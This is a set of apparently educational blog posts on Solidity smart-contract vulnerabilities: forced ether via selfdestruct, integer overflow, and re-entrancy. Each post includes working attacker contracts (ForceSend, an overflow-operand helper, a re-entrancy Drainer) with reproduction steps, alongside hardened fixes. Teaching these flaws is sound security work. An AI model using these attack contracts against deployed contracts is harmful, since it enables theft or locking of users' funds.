Solidity Security Vulnerabilities: Unexpected Ether

A contract may be vulnerable if it incorrectly uses address(this).balance, because a contract's balance can be increased without any of its functions ever being called. I modified the EtherGame contract from https://github.com/sigp/solidity-security-blog#3-unexpected-ether-1 and wrote the Player and Attacker contracts to demonstrate this vulnerability.

How to test:
1. Deploy EtherGame and note the contract's address.
2. Deploy the Player contract with 5 Ether and pass EtherGame's address to the constructor.
3. Deploy …
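The force-feed path behind this vulnerability, as an added example that is not the page's own EtherGame/Player/Attacker code (the contract names BalanceGame, ForceSend and BalanceGameFixed, and the 5 ether target, are assumed here). The game trusts address(this).balance as its state; a selfdestruct transfers ether to it without running any of its code, so the balance can be pushed past the target and the game locked:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not the page's EtherGame: a round ends when the
// balance lands exactly on TARGET, and the check reads the balance directly.
contract BalanceGame {
    uint256 public constant TARGET = 5 ether;
    address public winner;

    // Each player deposits exactly 1 ether. The code assumes the balance only
    // grows through play(), which is not true on Ethereum.
    function play() external payable {
        require(msg.value == 1 ether, "exactly 1 ether");
        uint256 bal = address(this).balance;
        require(bal <= TARGET, "game over");
        if (bal == TARGET) {
            winner = msg.sender;
        }
    }

    function claim() external {
        require(msg.sender == winner, "not winner");
        uint256 amount = address(this).balance;
        winner = address(0);
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Force-feeds ether into the game. selfdestruct moves the balance without a
// call to the recipient, so no receive()/fallback runs and BalanceGame has no
// way to reject it. Since EIP-6780 (Cancun) selfdestruct no longer deletes a
// contract created in an earlier transaction, but the forced transfer remains.
contract ForceSend {
    function attack(address payable target) external payable {
        selfdestruct(target);
    }
}

// Same game with deposits tracked in storage. A forced transfer still raises
// address(this).balance, but it cannot move `deposited`, so the game state
// can no longer be corrupted from outside.
contract BalanceGameFixed {
    uint256 public constant TARGET = 5 ether;
    uint256 public deposited;
    address public winner;

    function play() external payable {
        require(msg.value == 1 ether, "exactly 1 ether");
        deposited += msg.value;
        require(deposited <= TARGET, "game over");
        if (deposited == TARGET) {
            winner = msg.sender;
        }
    }

    function claim() external {
        require(msg.sender == winner, "not winner");
        uint256 amount = deposited;
        deposited = 0;
        winner = address(0);
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```

To reproduce: let four players call play() on BalanceGame (balance 4 ether), then deploy ForceSend and call attack(gameAddress) with 0.5 ether. The balance is now 4.5 ether, every further play() sees 5.5 ether and reverts with "game over", winner is never set, and the 4.5 ether is stuck. The same sequence against BalanceGameFixed leaves `deposited` at 4 ether and the fifth player wins as intended; the extra 0.5 ether is merely stranded, which is the worst an attacker can do once the contract stops reading its own balance as state.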

Solidity Security Vulnerabilities: Arithmetic Over/Under Flows

Prior to v0.8.0, Solidity contracts were vulnerable to over/underflow attacks: arithmetic on fixed-width integers silently wrapped, so the operations +, - and * could be exploited if the attacker controls the value of at least one operand. Since 0.8.0 these operations revert on overflow unless they are placed inside an unchecked block. A demo of the over/underflow behaviour is provided below. To see the vulnerability in action, let's look at the contract from one …
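An added example, not the page's own demo, of the over/underflow behaviour on a time-locked deposit (the contract name TimeLockDemo and the one-week lock are assumed). The `unchecked` block reproduces the wrapping arithmetic every compiler before 0.8.0 emitted; the same statement outside it reverts under 0.8's default checked arithmetic:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration: deposits are locked for a week, and the owner of a
// deposit may extend (but, by intent, never shorten) the lock.
contract TimeLockDemo {
    mapping(address => uint256) public balances;
    mapping(address => uint256) public lockTime;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
        lockTime[msg.sender] = block.timestamp + 1 weeks;
    }

    // Vulnerable variant: wrapping arithmetic, as produced before 0.8.0.
    // Passing secondsToIncrease = 2**256 - lockTime[msg.sender] wraps the
    // sum to 0, so the lock expires immediately.
    function increaseLockTimeUnchecked(uint256 secondsToIncrease) external {
        unchecked {
            lockTime[msg.sender] += secondsToIncrease;
        }
    }

    // Same statement with 0.8 checked arithmetic: the overflow reverts with
    // Panic(0x11) instead of wrapping.
    function increaseLockTime(uint256 secondsToIncrease) external {
        lockTime[msg.sender] += secondsToIncrease;
    }

    function withdraw() external {
        require(balances[msg.sender] > 0, "nothing to withdraw");
        require(block.timestamp > lockTime[msg.sender], "still locked");
        uint256 amount = balances[msg.sender];
        balances[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }

    // The operand an attacker passes to zero a given lock under wrapping
    // arithmetic: 0 - currentLock modulo 2**256.
    function overflowOperand(uint256 currentLock) external pure returns (uint256) {
        unchecked {
            return 0 - currentLock;
        }
    }
}
```

To reproduce: deposit(), read lockTime(yourAddress), call overflowOperand() with that value, pass the result to increaseLockTimeUnchecked(), and withdraw() succeeds in the same block; the same operand passed to increaseLockTime() reverts. Note that 0.8's checks cover +, -, *, / and ** but not explicit narrowing conversions (uint8(x) still truncates) or shift operators, so those still need manual range checks.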

Solidity Security Vulnerabilities

Here is a list of smart contract security vulnerabilities I made while going through this blog post by Sigma Prime: https://blog.sigmaprime.io/solidity-security.html. Some vulnerabilities have been fixed since the blog was published, and I have highlighted this wherever necessary. This is going to be a series of posts, listed below:
https://aaruni.io/2022/08/solidity-security-vulnerabilities-re-entrancy
https://aaruni.io/2022/08/solidity-security-vulnerabilities-arithmetic-over-under-flows
https://aaruni.io/2022/08/solidity-security-vulnerabilities-unexpected-ether
https://aaruni.io/2022/08/solidity-security-vulnerabilities-tx-origin-authentication
…

Solidity Security Vulnerabilities: Re-Entrancy

Re-entrancy, as the name suggests, is when contract A calls a function in an untrusted contract B, which then calls back into A maliciously before A's original call has finished and its state has been updated. In the example I provide below, the contract named "Vulnerable" is a faucet that provides 10 wei per week to any caller. Our "Attacker" contract exploits the fact that: The Vulnerable …
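The faucet pattern described above, as an added example that is not the page's own Vulnerable/Attacker code (the names Faucet, Drainer and FaucetFixed are assumed). The vulnerable faucet sends the 10 wei before recording the drip, so the recipient's receive() can call drip() again while the rate-limit state still holds the old value; the hardened version applies checks-effects-interactions and a mutex, either of which alone stops the attack:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration: pays 10 wei once per week per caller, but performs the
// external call before updating the timestamp that enforces the limit.
contract Faucet {
    uint256 public constant DRIP = 10 wei;
    mapping(address => uint256) public lastDrip;

    receive() external payable {} // for funding the faucet

    function drip() external {
        require(block.timestamp >= lastDrip[msg.sender] + 1 weeks, "too soon");
        // Interaction before effect: the callee can re-enter drip() while
        // lastDrip[msg.sender] still holds the old value.
        (bool ok, ) = msg.sender.call{value: DRIP}("");
        require(ok, "send failed");
        lastDrip[msg.sender] = block.timestamp;
    }
}

// Re-enters drip() from receive() until a hop limit or the faucet runs dry,
// then lets the nested calls unwind.
contract Drainer {
    Faucet public immutable faucet;
    uint256 public hops;

    constructor(address payable f) {
        faucet = Faucet(f);
    }

    function attack() external {
        hops = 0;
        faucet.drip();
    }

    receive() external payable {
        hops += 1;
        // Every nested call sees lastDrip == 0 and passes the check.
        if (address(faucet).balance >= faucet.DRIP() && hops < 50) {
            faucet.drip();
        }
    }
}

// Hardened faucet: state is updated before the external call, and a mutex
// rejects any call that arrives while drip() is still on the stack.
contract FaucetFixed {
    uint256 public constant DRIP = 10 wei;
    mapping(address => uint256) public lastDrip;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    receive() external payable {}

    function drip() external nonReentrant {
        require(block.timestamp >= lastDrip[msg.sender] + 1 weeks, "too soon");
        lastDrip[msg.sender] = block.timestamp;         // effect first
        (bool ok, ) = msg.sender.call{value: DRIP}("");  // interaction last
        require(ok, "send failed");
    }
}
```

To reproduce: fund Faucet with a few hundred wei, deploy Drainer with the faucet's address and call attack(); Drainer ends the transaction holding 50 drips' worth (500 wei) from a single call. Against FaucetFixed the nested drip() reverts with "reentrant call", which propagates through Drainer.receive() and fails the outer send, so the attacker gets nothing. Note that `transfer` and `send` forward only 2300 gas and would also block this particular attacker, but they break with legitimate recipients and are not a substitute for ordering state updates before external calls.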

Hello World or How I learned Solidity Security Principles

This is a list of resources that I used in my journey towards learning about Ethereum, Solidity and its security landscape:
- If you are like me and want to begin by learning about blockchain fundamentals, then start with this intro: https://www.youtube.com/watch?v=_160oMzblY8
- For a deep dive into Ethereum, read the first 6 chapters of the Mastering …